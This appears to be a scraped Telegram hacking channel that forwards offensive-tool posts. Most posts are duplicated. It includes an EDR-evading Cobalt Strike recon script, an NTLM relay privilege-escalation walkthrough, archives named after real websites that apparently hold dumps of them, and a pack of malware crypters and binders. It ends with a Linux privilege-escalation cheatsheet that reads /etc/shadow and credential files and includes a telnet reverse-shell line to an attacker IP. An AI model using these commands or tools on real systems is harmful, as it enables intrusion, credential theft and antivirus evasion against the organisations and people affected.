Forwarded from 卩ro 爪Cracker
What is HTTP-TRACKER?
HTTP-TRACKER is a browser extension which tracks the network on the browser (chrome and firefox). What ever is captured on the network tab in a browser, the same and more can be done by this extension.
This provides a centralized window which displays the entire requests - responses from all the tabs and all windows of the browser. This can also track the private/incognito window tabs (if permission is enabled), bringing everything into a central place.
https://github.com/venukbh/http-tracker
HTTP-TRACKER is a browser extension which tracks the network on the browser (chrome and firefox). What ever is captured on the network tab in a browser, the same and more can be done by this extension.
This provides a centralized window which displays the entire requests - responses from all the tabs and all windows of the browser. This can also track the private/incognito window tabs (if permission is enabled), bringing everything into a central place.
https://github.com/venukbh/http-tracker
👍2
Forwarded from 卩ro 爪Cracker
Registry-Recon
Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon.
As a red-team practitioner, we are often using tools that attempt to fingerprint details about a compromised system, preferably in the most stealthy way possible.
Some of our usual tooling for this started getting flagged by EDR products, due to the use of Windows CLI commands. This aggressor script aims to solve that problem by only probing the system using native registry queries, no CLI commands.
https://github.com/optiv/Registry-Recon
Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon.
As a red-team practitioner, we are often using tools that attempt to fingerprint details about a compromised system, preferably in the most stealthy way possible.
Some of our usual tooling for this started getting flagged by EDR products, due to the use of Windows CLI commands. This aggressor script aims to solve that problem by only probing the system using native registry queries, no CLI commands.
https://github.com/optiv/Registry-Recon
❤1
Forwarded from 卩ro 爪Cracker
NTLMRelay2Self over HTTP
Just a walkthrough of how to escalate privileges locally by forcing the system you landed initial access on to reflectively authenticate over HTTP to itself and forward the received connection to an HTTP listener (ntlmrelayx) configured to relay to DC servers over LDAP/LDAPs for either setting shadow credentials or configuring RBCD.
https://github.com/med0x2e/NTLMRelay2Self
#ad #ntlm #relay #rbcd #redteam
Just a walkthrough of how to escalate privileges locally by forcing the system you landed initial access on to reflectively authenticate over HTTP to itself and forward the received connection to an HTTP listener (ntlmrelayx) configured to relay to DC servers over LDAP/LDAPs for either setting shadow credentials or configuring RBCD.
https://github.com/med0x2e/NTLMRelay2Self
#ad #ntlm #relay #rbcd #redteam
GitHub
GitHub - med0x2e/NTLMRelay2Self: An other No-Fix LPE, NTLMRelay2Self over HTTP (Webdav).
An other No-Fix LPE, NTLMRelay2Self over HTTP (Webdav). - med0x2e/NTLMRelay2Self
Forwarded from 卩ro 爪Cracker
Ronin
Ruby platform for vulnerability research and exploit development. Ronin allows for the rapid development and distribution of code, Exploits or Payloads, Scanners, etc, via Repositories.
Features:
▫️ Supports installing/updating/uninstalling of Repositories.
▫️ Provides a Database using DataMapper
▫️ Caches exploits, payloads, scanners, etc stored within Repositories into the Database.
▫️ Convenience methods provided by ronin-support.
▫️ Provides a customized Ruby Console using Ripl
▫️ Provides an extensible command-line interface.
https://github.com/ronin-rb/ronin
Ruby platform for vulnerability research and exploit development. Ronin allows for the rapid development and distribution of code, Exploits or Payloads, Scanners, etc, via Repositories.
Features:
▫️ Supports installing/updating/uninstalling of Repositories.
▫️ Provides a Database using DataMapper
▫️ Caches exploits, payloads, scanners, etc stored within Repositories into the Database.
▫️ Convenience methods provided by ronin-support.
▫️ Provides a customized Ruby Console using Ripl
▫️ Provides an extensible command-line interface.
https://github.com/ronin-rb/ronin
Forwarded from 卩ro 爪Cracker
ccitav.sites.clemson.edu.7z
8.2 KB
http://ccitav.sites.clemson.edu, Clemson University, South Carolina
Forwarded from 卩ro 爪Cracker
coosemansla.com.7z
823.5 KB
http://coosemansla.com, Coosemans Los Angeles
👍1
Forwarded from 卩ro 爪Cracker
dental21.co.uk.7z
7.4 KB
http://dental21.co.uk, Dental 21 - Fibre Post Supplier for the UK
Forwarded from 卩ro 爪Cracker
www.digital-academy.com.pk.7z
859 B
http://www.digital-academy.com.pk, Digital Academy
Forwarded from 卩ro 爪Cracker
djibouti.post-stamps.com.7z
47.1 KB
http://djibouti.post-stamps.com, Postage stamps of Djibouti
Forwarded from 卩ro 爪Cracker
emc.dn.ua.7z
324.3 KB
http://emc.dn.ua, ЭНЕРГОМАШКОМПЛЕКТ-ДОНБАСС :: Насосы, электродвигатели, турбокомпрессор тв, турбогазодувка тг, редукторы, тельферы, 4аму, 6аму, аимм, аиу, грк, грт, гр, грат, ВВН, ВВН 1/25, ВВН 1/50
Forwarded from 卩ro 爪Cracker
eqxglobal.com.7z
20.4 KB
http://eqxglobal.com, EQX Global | Focusing on Your Business Fairway
Forwarded from 卩ro 爪Cracker
evidendo.com.7z
72.4 KB
http://evidendo.com, EVIDENDO - Marketplace for business and innovation
Forwarded from 卩ro 爪Cracker
forumchaves.com.br.7z
310.3 KB
http://forumchaves.com.br, Fórum Chaves • Chaves, Chapolin e Chespirito é aqui - ÍNDICE
Report On @fera_chats (This is A Scammers Group) And Send Me A Screenshot on @MCracker2002 , If You Can I Give you Access in my Private Group ( https://t.me/crackcodes/373 )
CrackCodes 🇮🇳 pinned «Report On @fera_chats (This is A Scammers Group) And Send Me A Screenshot on @MCracker2002 , If You Can I Give you Access in my Private Group ( https://t.me/crackcodes/373 )»
Hacking a Bank by Finding a 0day in dotCMS
https://ift.tt/vTHxd7V
Submitted May 03, 2022 at 01:47PM by Mempodipper
via reddit https://ift.tt/a25vMEA
https://ift.tt/vTHxd7V
Submitted May 03, 2022 at 01:47PM by Mempodipper
via reddit https://ift.tt/a25vMEA
Crypters & Binders TOOLS.rar
58.9 MB
Use on vm or in sandbox
Infinity Crypter v2
no$crypter
OwnZ Crypter 3.5.9
Psomasweb_Public_Rinajel_Crypter
Quest Crypter
RedLions Binder
Refacts Crypter
Saddam Crypter
Shock Labs File Binder v1.0
Sikandar Crypter
SImple Crypt0r v2
The DarKness binDer
Unknow Crypter Private
0 Crypter
2021 Crypter
Black-Crypt
Byte Crypter V3
Chrome Crypter 4.9
CrypteX Advanced
Daemon Crypter 2 Public
Easy Binder
High Life Crypter
Infinity Crypter v2
no$crypter
OwnZ Crypter 3.5.9
Psomasweb_Public_Rinajel_Crypter
Quest Crypter
RedLions Binder
Refacts Crypter
Saddam Crypter
Shock Labs File Binder v1.0
Sikandar Crypter
SImple Crypt0r v2
The DarKness binDer
Unknow Crypter Private
0 Crypter
2021 Crypter
Black-Crypt
Byte Crypter V3
Chrome Crypter 4.9
CrypteX Advanced
Daemon Crypter 2 Public
Easy Binder
High Life Crypter
Remove PDF Password From Android Phone?
Let's quickly tell you how you can remove a password from your PDF file if using an android phone.
First, download the PDF file from which you want to remove the password.
Download PDF Utilities from the Playstore app.
Open the application and tap on select.
Select the PDF file you downloaded.
On selecting the file, click on start.
A pop-up notification will ask you the PDF password.
Enter the password and then click on OK.
Next, go back to the same location where the original PDF was saved.
You will find the new PDF file without password protection.
Let's quickly tell you how you can remove a password from your PDF file if using an android phone.
Download PDF Utilities from the Playstore app.
Open the application and tap on select.
Select the PDF file you downloaded.
On selecting the file, click on start.
A pop-up notification will ask you the PDF password.
Enter the password and then click on OK.
Next, go back to the same location where the original PDF was saved.
You will find the new PDF file without password protection.
keep learning ❤️😱5👏1
𝙏𝙝𝙚 𝙇𝙞𝙣𝙪𝙭 𝙋𝙧𝙞𝙫𝙞𝙡𝙚𝙜𝙚 𝙀𝙨𝙘𝙖𝙡𝙖𝙩𝙞𝙤𝙣 𝘾𝙝𝙚𝙖𝙩𝙨𝙝𝙚𝙚𝙩
Operating System
What's the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
What's the kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
Is there a printer?
lpstat -a
Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/services
Which service(s) are been running by root? Of these services, which are vulnerable
ps aux | grep root
ps -ef | grep root
What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
Whats cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee
Is packet sniffing possible? What can be seen? Listen to live traffic
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21
Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
Have you got a shell? Can you interact with the system?
nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!
Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l
What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
Anything "interesting" in the home directorie(s)? If it's possible to access
ls -ahlR /root/
ls -ahlR /home/
Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
What has the user being doing? Is there any password in plain text? What have they been edting?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
Operating System
What's the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
What's the kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-
What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set
Is there a printer?
lpstat -a
Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/services
Which service(s) are been running by root? Of these services, which are vulnerable
ps aux | grep root
ps -ef | grep root
What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archivesO
ls -alh /var/cache/yum/
Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/
What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root
Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla
Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network
What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname
What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on
last
w
Whats cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee
Is packet sniffing possible? What can be seen? Listen to live traffic
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.5.5.252 21
Note: tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
Have you got a shell? Can you interact with the system?
nc -lvp 4444 # Attacker. Input (Commands)
nc -lvp 4445 # Attacker. Ouput (Results)
telnet [attackers ip] 44444 | /bin/sh | [local ip] 44445 # On the targets system. Use the attackers IP!
Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: -f1 # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd # List of super users
cat /etc/sudoers
sudo -l
What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/
Anything "interesting" in the home directorie(s)? If it's possible to access
ls -ahlR /root/
ls -ahlR /home/
Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg
What has the user being doing? Is there any password in plain text? What have they been edting?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history
What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root
🔥2